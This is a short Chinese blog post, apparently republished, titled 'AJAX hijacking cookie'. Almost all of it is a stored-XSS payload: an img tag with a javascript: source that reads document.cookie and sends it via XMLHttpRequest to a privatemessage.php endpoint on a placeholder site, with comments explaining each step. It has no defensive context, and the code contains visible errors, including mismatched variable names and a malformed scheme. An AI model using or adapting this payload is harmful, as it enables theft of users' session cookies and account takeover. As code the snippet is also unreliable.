首页 > Web开发 > 详细

AJAX 劫持cookie

时间:2014-10-10 16:47:55      阅读:339      评论:0      收藏:0      [点我收藏+]

一个简单的httprequest声明以及提交的过程

<img src="javascript.: 
//这里先要把XMLHttpRequestObject设置为false来验证声明httprequest时是否为true
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
  XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
  XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
  alert("Javascript must be enabled to continue.");
}
function socket()
{
//下面这行将非常重要.注意cookies是以参数的形式进行提交的

  XMLHttpRequestObject.open(‘GET‘, ‘http://www.site.com/privatemessage.php?
user=yourusername&subject=‘ + window.document.cookie, true);
  XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  XMLHttpRequestObject.send(null);
//这句执行完,我们就可以放下心来了。
  delete XMLHttpRequestObject;
}
//不要忘记这是一张图片,所以我们必须关闭标签
window.document.onload=‘socket();‘">

AJAX 劫持cookie

原文:http://www.cnblogs.com/xiao-kkp/p/4016057.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!